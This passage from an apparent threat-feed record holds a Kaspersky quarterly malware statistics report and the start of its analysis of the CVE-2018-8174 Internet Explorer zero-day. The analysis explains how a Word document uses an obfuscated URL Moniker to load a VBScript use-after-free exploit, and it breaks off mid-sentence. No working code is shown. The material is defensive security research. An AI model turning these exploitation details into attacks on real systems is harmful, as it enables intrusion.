mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. Incidentally, Egat.d is a pared-down version of Zebt.a, both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000) \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications, that it can only be compared to amount of Adobe Flash vulnerabilities found in the past. But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack overflow-type vulnerability in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing the protection and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (supposedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, it was [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organisation to criminal accounts, and inflate bank balances with money mules being used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n \n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32. Zbot | 28.0% | \n2 | Nymaim | Trojan.Win32. Nymaim | 20.3% | \n3 | Caphaw | Backdoor.Win32. Caphaw | 15.2% | \n4 | SpyEye | Backdoor.Win32. SpyEye | 11.9% | \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% | \n6 | Emotet | Backdoor.Win32. Emotet | 2.4% | \n7 | Neurevt | Trojan.Win32. Neurevt | 2.3% | \n8 | Shiz | Backdoor.Win32. Shiz | 2.1% | \n9 | Gozi | Trojan.Win32. Gozi | 1.9% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.__ \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, as did their Q1 activity.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&amp;C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. In February, for example, there appeared a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>), able to be distributed by any cybercriminal who so desired. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by \"affilate program\" participants. A dangerous feature of this malware is its ability to automatically propagate inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Trojan Cryakl. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, there appeared several new cryptors, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 | \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 | \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 | \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 | \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 | \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 | \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that's been around for a while. This malware substitutes user files with modified instances of its own body, and places victim data inside these copies in an encrypted format. Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112 **attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of triggers in response to attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). Canada, China, Ireland, and Ukraine dropped out of TOP 10 to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). \n_** _Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).", "cvss3": {}, "published": "2018-05-14T10:00:30", "type": "securelist", "title": "IT threat evolution Q1 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-4878"], "modified": "2018-05-14T10:00:30", "id": "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "href": "https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-10T11:03:43", "description": "\n\nIn late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox; more than two years since the last in the wild example (CVE-2016-0189). This particular vulnerability and subsequent exploit are interesting for many reasons. The following article will examine the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. This exploit was detected by several AV vendors including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_Virustotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded; an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document, that was used to deliver the actual exploit for IE. It only contains one object, and its contents are obfuscated using a known obfuscation technique we call \"[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)\".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\\(v=vs.85\\).aspx>) CLSID. Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes; the Content-Type HTTP header in the server's response being one of them. Because the default handler for the \"application/hta\" Content-Type is mshta.exe,it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not \"application/hta\", which was a requirement for CVE-2017-0199 exploitation, but rather \"text/html\". The default OLE server for \"text/html\" is mshtml.dll, which is a library that contains the engine, behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying registry for correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. Because this disallows an attacker from directly executing a payload, as was the case with the HTA handler, an Internet Explorer exploit is needed to overcome that.\n\nUsing a URL moniker like that to load a remote web page is possible, because Microsoft's patch for Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) introduced an activation filter, which allows applications to specify which COM objects are restricted from instantiating at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the filtered COM objects, restricted from creating by IActivationFilter in MSO.dll_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. TheMSHTML CLSID ({{25336920-03F9-11CF-8FD0-00AA00686F13}}) is not in the list, which is why the MSHTML COM server is successfully created in Word context.\n\nThis is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. This technique allows one to load and render a web page using the IE engine, even if default browser on a victim's machine is set to something different.\n\nThe VBScript in the downloaded HTML page contains both function names and integer values that are obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability Trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object memory will be reused with the 'ClassToReuse' object, the exploit allocates some class objects. To trigger the vulnerability this code could be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 Proof Of Concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled we can observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access Violation on a call to freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_Freed memory pointer is reused when the second array 